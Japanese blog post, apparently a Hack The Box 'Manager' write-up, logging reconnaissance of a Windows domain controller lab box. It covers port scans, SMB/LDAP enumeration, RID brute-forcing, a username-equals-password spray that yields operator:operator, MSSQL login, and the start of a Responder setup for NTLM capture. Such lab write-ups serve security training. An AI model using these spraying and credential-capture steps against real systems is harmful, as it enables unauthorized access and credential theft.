初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「Manager」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
初期探索
ポートスキャン
┌──(root㉿kali)-[~]
└─# rustscan -a 10.129.144.138 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.144.138:53
Open 10.129.144.138:80
Open 10.129.144.138:88
Open 10.129.144.138:135
Open 10.129.144.138:139
Open 10.129.144.138:389
Open 10.129.144.138:445
Open 10.129.144.138:464
Open 10.129.144.138:593
Open 10.129.144.138:636
Open 10.129.144.138:9389
Open 10.129.144.138:49667
Open 10.129.144.138:49677
Open 10.129.144.138:49678
Open 10.129.144.138:49679
Open 10.129.144.138:49716
Open 10.129.144.138:50765
Open 10.129.144.138:56418
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:12 EDT
Initiating Ping Scan at 06:12
Scanning 10.129.144.138 [4 ports]
Completed Ping Scan at 06:12, 0.28s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 06:12
Completed Parallel DNS resolution of 1 host. at 06:12, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 06:12
Scanning 10.129.144.138 [18 ports]
Discovered open port 135/tcp on 10.129.144.138
Discovered open port 445/tcp on 10.129.144.138
Discovered open port 53/tcp on 10.129.144.138
Discovered open port 49677/tcp on 10.129.144.138
Discovered open port 80/tcp on 10.129.144.138
Discovered open port 139/tcp on 10.129.144.138
Discovered open port 464/tcp on 10.129.144.138
Discovered open port 50765/tcp on 10.129.144.138
Discovered open port 88/tcp on 10.129.144.138
Discovered open port 49678/tcp on 10.129.144.138
Discovered open port 49716/tcp on 10.129.144.138
Discovered open port 56418/tcp on 10.129.144.138
Discovered open port 49679/tcp on 10.129.144.138
Discovered open port 593/tcp on 10.129.144.138
Discovered open port 49667/tcp on 10.129.144.138
Discovered open port 636/tcp on 10.129.144.138
Discovered open port 389/tcp on 10.129.144.138
Discovered open port 9389/tcp on 10.129.144.138
Completed SYN Stealth Scan at 06:12, 0.56s elapsed (18 total ports)
Nmap scan report for 10.129.144.138
Host is up, received echo-reply ttl 127 (0.27s latency).
Scanned at 2023-10-24 06:12:50 EDT for 1s
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
80/tcp open http syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49677/tcp open unknown syn-ack ttl 127
49678/tcp open unknown syn-ack ttl 127
49679/tcp open unknown syn-ack ttl 127
49716/tcp open unknown syn-ack ttl 127
50765/tcp open unknown syn-ack ttl 127
56418/tcp open unknown syn-ack ttl 127
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds
Raw packets sent: 22 (944B) | Rcvd: 19 (820B)
Windows環境でよく見るポートが公開されている。
ドメイン情報収集
ldapのスクリプトも回してさっとAD環境の情報を取得する。
┌──(root㉿kali)-[~]
└─# nmap -p 389 -n -Pn 10.129.144.138 --script ldap-rootdse
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:14 EDT
Nmap scan report for 10.129.144.138
Host is up (0.26s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| domainFunctionality: 7
| forestFunctionality: 7
| domainControllerFunctionality: 7
| rootDomainNamingContext: DC=manager,DC=htb
| ldapServiceName: manager.htb:dc01$@MANAGER.HTB
| isGlobalCatalogReady: TRUE
| supportedSASLMechanisms: GSSAPI
| supportedSASLMechanisms: GSS-SPNEGO
| supportedSASLMechanisms: EXTERNAL
| supportedSASLMechanisms: DIGEST-MD5
| supportedLDAPVersion: 3
| supportedLDAPVersion: 2
| supportedLDAPPolicies: MaxPoolThreads
| supportedLDAPPolicies: MaxPercentDirSyncRequests
| supportedLDAPPolicies: MaxDatagramRecv
| supportedLDAPPolicies: MaxReceiveBuffer
| supportedLDAPPolicies: InitRecvTimeout
| supportedLDAPPolicies: MaxConnections
| supportedLDAPPolicies: MaxConnIdleTime
| supportedLDAPPolicies: MaxPageSize
| supportedLDAPPolicies: MaxBatchReturnMessages
| supportedLDAPPolicies: MaxQueryDuration
| supportedLDAPPolicies: MaxDirSyncDuration
| supportedLDAPPolicies: MaxTempTableSize
| supportedLDAPPolicies: MaxResultSetSize
| supportedLDAPPolicies: MinResultSets
| supportedLDAPPolicies: MaxResultSetsPerConn
| supportedLDAPPolicies: MaxNotificationPerConn
| supportedLDAPPolicies: MaxValRange
| supportedLDAPPolicies: MaxValRangeTransitive
| supportedLDAPPolicies: ThreadMemoryLimit
| supportedLDAPPolicies: SystemMemoryLimitPercent
| supportedControl: 1.2.840.113556.1.4.319
| supportedControl: 1.2.840.113556.1.4.801
| supportedControl: 1.2.840.113556.1.4.473
| supportedControl: 1.2.840.113556.1.4.528
| supportedControl: 1.2.840.113556.1.4.417
| supportedControl: 1.2.840.113556.1.4.619
| supportedControl: 1.2.840.113556.1.4.841
| supportedControl: 1.2.840.113556.1.4.529
| supportedControl: 1.2.840.113556.1.4.805
| supportedControl: 1.2.840.113556.1.4.521
| supportedControl: 1.2.840.113556.1.4.970
| supportedControl: 1.2.840.113556.1.4.1338
| supportedControl: 1.2.840.113556.1.4.474
| supportedControl: 1.2.840.113556.1.4.1339
| supportedControl: 1.2.840.113556.1.4.1340
| supportedControl: 1.2.840.113556.1.4.1413
| supportedControl: 2.16.840.1.113730.3.4.9
| supportedControl: 2.16.840.1.113730.3.4.10
| supportedControl: 1.2.840.113556.1.4.1504
| supportedControl: 1.2.840.113556.1.4.1852
| supportedControl: 1.2.840.113556.1.4.802
| supportedControl: 1.2.840.113556.1.4.1907
| supportedControl: 1.2.840.113556.1.4.1948
| supportedControl: 1.2.840.113556.1.4.1974
| supportedControl: 1.2.840.113556.1.4.1341
| supportedControl: 1.2.840.113556.1.4.2026
| supportedControl: 1.2.840.113556.1.4.2064
| supportedControl: 1.2.840.113556.1.4.2065
| supportedControl: 1.2.840.113556.1.4.2066
| supportedControl: 1.2.840.113556.1.4.2090
| supportedControl: 1.2.840.113556.1.4.2205
| supportedControl: 1.2.840.113556.1.4.2204
| supportedControl: 1.2.840.113556.1.4.2206
| supportedControl: 1.2.840.113556.1.4.2211
| supportedControl: 1.2.840.113556.1.4.2239
| supportedControl: 1.2.840.113556.1.4.2255
| supportedControl: 1.2.840.113556.1.4.2256
| supportedControl: 1.2.840.113556.1.4.2309
| supportedControl: 1.2.840.113556.1.4.2330
| supportedControl: 1.2.840.113556.1.4.2354
| supportedCapabilities: 1.2.840.113556.1.4.800
| supportedCapabilities: 1.2.840.113556.1.4.1670
| supportedCapabilities: 1.2.840.113556.1.4.1791
| supportedCapabilities: 1.2.840.113556.1.4.1935
| supportedCapabilities: 1.2.840.113556.1.4.2080
| supportedCapabilities: 1.2.840.113556.1.4.2237
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=manager,DC=htb
| serverName: CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
| schemaNamingContext: CN=Schema,CN=Configuration,DC=manager,DC=htb
| namingContexts: DC=manager,DC=htb
| namingContexts: CN=Configuration,DC=manager,DC=htb
| namingContexts: CN=Schema,CN=Configuration,DC=manager,DC=htb
| namingContexts: DC=DomainDnsZones,DC=manager,DC=htb
| namingContexts: DC=ForestDnsZones,DC=manager,DC=htb
| isSynchronized: TRUE
| highestCommittedUSN: 138319
| dsServiceName: CN=NTDS Settings,CN=DC01,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=manager,DC=htb
| dnsHostName: dc01.manager.htb
| defaultNamingContext: DC=manager,DC=htb
| currentTime: 20231024171421.0Z
|_ configurationNamingContext: CN=Configuration,DC=manager,DC=htb
Service Info: Host: DC01; OS: Windows
Nmap done: 1 IP address (1 host up) scanned in 1.48 seconds
manager.htbのドメイン情報を掴むことが出来た。この情報は/etc/hostsに以下のように設定しておく
10.129.144.138 manager.htb
enum4linuxも回しておく
┌──(root㉿kali)-[~]
└─# enum4linux 10.129.144.138
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Oct 24 06:16:32 2023
=========================================( Target Information )=========================================
Target ........... 10.129.144.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 10.129.144.138 )===========================
[E] Can't find workgroup/domain
===============================( Nbtstat Information for 10.129.144.138 )===============================
Looking up status of 10.129.144.138
No reply from 10.129.144.138
==================================( Session Check on 10.129.144.138 )==================================
[+] Server 10.129.144.138 allows sessions using username '', password ''
===============================( Getting domain SID for 10.129.144.138 )===============================
Domain Name: MANAGER
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[+] Host is part of a domain (not a workgroup)
==================================( OS information on 10.129.144.138 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.144.138 from srvinfo:
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
======================================( Users on 10.129.144.138 )======================================
[E] Couldn't find users using querydispinfo: NT_STATUS_ACCESS_DENIED
[E] Couldn't find users using enumdomusers: NT_STATUS_ACCESS_DENIED
================================( Share Enumeration on 10.129.144.138 )================================
do_connect: Connection to 10.129.144.138 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.144.138
===========================( Password Policy Information for 10.129.144.138 )===========================
[E] Unexpected error from polenum:
[+] Attaching to 10.129.144.138 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.144.138)
[+] Trying protocol 445/SMB...
[!] Protocol failed: SAMR SessionError: code: 0xc0000022 - STATUS_ACCESS_DENIED - {Access Denied} A process has requested access to an object but has not been granted those access rights.
[E] Failed to get password policy with rpcclient
======================================( Groups on 10.129.144.138 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 10.129.144.138 via RID cycling (RIDS: 500-550,1000-1050) )=================
[E] Couldn't get SID: NT_STATUS_ACCESS_DENIED. RID cycling not possible.
==============================( Getting printer info for 10.129.144.138 )==============================
do_cmd: Could not initialise spoolss. Error was NT_STATUS_ACCESS_DENIED
enum4linux complete on Tue Oct 24 06:17:37 2023
rpcclientでの探索もしておく。
┌──(root㉿kali)-[~]
└─# rpcclient 10.129.144.138 -U '' -N
rpcclient $> enumdomains
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> lsaquery
Domain Name: MANAGER
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
rpcclient $> querydominfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>
smbclientも探っておく。
┌──(root㉿kali)-[~]
└─# smbclient -N -L \\\\10.129.144.138
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.144.138 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
ドメイン情報以外は特段いい情報がなかった。
Web探索
ブラウジング
Port80があいていたので、ブラウザでアクセスしてみる。
ほう。色々飛んでみたがいいものはなさそう。
更に探索を深める。
dirsearch
階層を探索していく。
┌──(root㉿kali)-[~]
└─# dirsearch -u http://manager.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/manager.htb/-_23-10-24_06-23-43.txt
Error Log: /root/.dirsearch/logs/errors-23-10-24_06-23-43.log
Target: http://manager.htb/
[06:23:44] Starting:
[06:23:47] 403 - 312B - /%2e%2e//google.com
[06:23:47] 301 - 145B - /js -> http://manager.htb/js/
[06:24:12] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[06:24:15] 200 - 5KB - /about.html
[06:24:43] 200 - 5KB - /contact.html
[06:24:44] 301 - 146B - /css -> http://manager.htb/css/
[06:24:56] 403 - 1KB - /images/
[06:24:56] 301 - 149B - /images -> http://manager.htb/images/
[06:24:57] 200 - 18KB - /index.html
[06:25:00] 403 - 1KB - /js/
特段いいものがなかったので、別Toolを利用する。
gobuster
以下のSeclistsからリストをダウンロードして利用します。
┌──(root㉿kali)-[~/work]
└─# gobuster dir -u http://manager.htb/ -k -x html -w ./directory-list-2.3-small.txt -t 200
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://manager.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: ./directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/about.html (Status: 200) [Size: 5386]
/contact.html (Status: 200) [Size: 5317]
/index.html (Status: 200) [Size: 18203]
/images (Status: 301) [Size: 149] [--> http://manager.htb/images/]
/Images (Status: 301) [Size: 149] [--> http://manager.htb/Images/]
/service.html (Status: 200) [Size: 7900]
/css (Status: 301) [Size: 146] [--> http://manager.htb/css/]
/About.html (Status: 200) [Size: 5386]
/Index.html (Status: 200) [Size: 18203]
/Contact.html (Status: 200) [Size: 5317]
/js (Status: 301) [Size: 145] [--> http://manager.htb/js/]
/IMAGES (Status: 301) [Size: 149] [--> http://manager.htb/IMAGES/]
/Service.html (Status: 200) [Size: 7900]
/INDEX.html (Status: 200) [Size: 18203]
/CSS (Status: 301) [Size: 146] [--> http://manager.htb/CSS/]
/JS (Status: 301) [Size: 145] [--> http://manager.htb/JS/]
/CONTACT.html (Status: 200) [Size: 5317]
/ABOUT.html (Status: 200) [Size: 5386]
Progress: 175328 / 175330 (100.00%)
===============================================================
Finished
===============================================================
特段いいものはありませんでした。
何も見つからにゃい...
nmapスクリプトでの調査
smb
smbに何か穴がないか確認します。
┌──(root㉿kali)-[~/work]
└─# nmap -n -Pn 10.129.144.138 -p 135,139,445 --script smb-protocols,smb-brute,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-services,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-os-discovery
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:41 EDT
Nmap scan report for 10.129.144.138
Host is up (0.28s latency).
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
445/tcp open microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)
Host script results:
| smb-protocols:
| dialects:
| 2:0:2
| 2:1:0
| 3:0:0
| 3:0:2
|_ 3:1:1
Nmap done: 1 IP address (1 host up) scanned in 29.35 seconds
ない。
Aオプション
┌──(root㉿kali)-[~/work]
└─# nmap -n -Pn 10.129.144.138 -A
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-24 06:52 EDT
Nmap scan report for 10.129.144.138
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-24 17:53:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-24T17:54:47+00:00; +6h59m56s from scanner time.
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.144.138:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.144.138:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-10-24T04:59:05
|_Not valid after: 2053-10-24T04:59:05
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-24T17:54:48+00:00; +6h59m56s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.manager.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.manager.htb
| Not valid before: 2023-07-30T13:51:28
|_Not valid after: 2024-07-29T13:51:28
|_ssl-date: 2023-10-24T17:54:47+00:00; +6h59m56s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m55s
| smb2-time:
| date: 2023-10-24T17:54:10
|_ start_date: N/A
TRACEROUTE (using port 53/tcp)
HOP RTT ADDRESS
1 270.89 ms 10.10.14.1
2 271.21 ms 10.129.144.138
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.58 second
1433でms-sqlがいることが分かった。
それ以外何もわからない。
総当たりしてみるか...
クレデンシャル情報奪取
smbが開いているのでこの周りでcrackmapexec回していきます。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 --pass-pol -u "guest" -p ""
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing SSH protocol database
[*] Initializing MSSQL protocol database
[*] Initializing WINRM protocol database
[*] Initializing SMB protocol database
[*] Initializing LDAP protocol database
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 10.129.144.138 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.144.138 445 DC01 [+] manager.htb\guest:
あ、guestで行けそう???RIDの総当たりしてみます。
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 --pass-pol -u "guest" -p "" --rid-brute
SMB 10.129.144.138 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.144.138 445 DC01 [+] manager.htb\guest:
SMB 10.129.144.138 445 DC01 [+] Brute forcing RIDs
SMB 10.129.144.138 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.144.138 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.129.144.138 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.129.144.138 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.129.144.138 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.129.144.138 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.129.144.138 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.129.144.138 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.129.144.138 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.129.144.138 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.129.144.138 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.129.144.138 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.129.144.138 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.144.138 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.144.138 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.144.138 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.129.144.138 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.129.144.138 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.144.138 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.144.138 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.144.138 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.144.138 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.129.144.138 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.129.144.138 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.144.138 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.129.144.138 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.129.144.138 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.129.144.138 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.129.144.138 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.129.144.138 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.129.144.138 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.129.144.138 445 DC01 1119: MANAGER\Operator (SidTypeUser)
くっそ...guestでいけるのか。このUser情報からPassword列挙する形か?それかAS-REP Roastingを実行するかどうかかな?ま、とりあえずcrackmapexec使ってるし、同名でPassword試してみます。
user_list
zhong
cheng
ryan
raven
jinwoo
chinhae
operator
┌──(root㉿kali)-[~/work]
└─# crackmapexec smb 10.129.144.138 -u user_list -p user_list --no-brute
SMB 10.129.144.138 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.144.138 445 DC01 [-] manager.htb\zhong:zhong STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [-] manager.htb\cheng:cheng STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [-] manager.htb\ryan:ryan STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [-] manager.htb\raven:raven STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [-] manager.htb\jinwoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [-] manager.htb\chinhae:chinhae STATUS_LOGON_FAILURE
SMB 10.129.144.138 445 DC01 [+] manager.htb\operator:operator
operatorでハマった!これでsmbできるか試してみます。Cいけたらいいなぁ!
┌──(root㉿kali)-[~/work]
└─# smbmap -H 10.129.144.138 -u operator -p operator
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.129.144.138:445 Name: manager.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
権限なかったのでsmbは厳しそうです。mssqlあったのでここら辺はどうでしょうか?
┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient manager.htb/operator:operator@10.129.144.138
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[-] ERROR(DC01\SQLEXPRESS): Line 1: Login failed for user 'operator'.
ダメと言われます。Windows認証ではどうでしょうか?
┌──(root㉿kali)-[~/work]
└─# impacket-mssqlclient manager.htb/operator:operator@10.129.144.138 -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>
イケました!
初期侵入
まずは情報列挙しときます。
SQL (MANAGER\Operator guest@master)> select @@version;
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL (MANAGER\Operator guest@master)> select user_name();
-----
guest
SQL (MANAGER\Operator guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
------
master
tempdb
model
msdb
SQL (MANAGER\Operator guest@master)>
ほう。まぁそんな感じですね。
xp_cmdshell
コマンドを実行できるか試しておきます。
SQL (MANAGER\Operator guest@master)> Use master
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
SQL (MANAGER\Operator guest@master)> SELECT IS_SRVROLEMEMBER('sysadmin');
-
0
SQL (MANAGER\Operator guest@master)> EXEC sp_helprotect 'xp_cmdshell'
[-] ERROR(DC01\SQLEXPRESS): Line 291: There are no matching rows on which to report.
ダメでした。
NTLM搾取
responderを立てておきます。
┌──(root㉿kali)-[~/work]
└─# sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.3.0
To support this project:
Patreon -> https://www.patreon.com/PythonResponder
Paypal -> https://paypal.me/PythonResponder
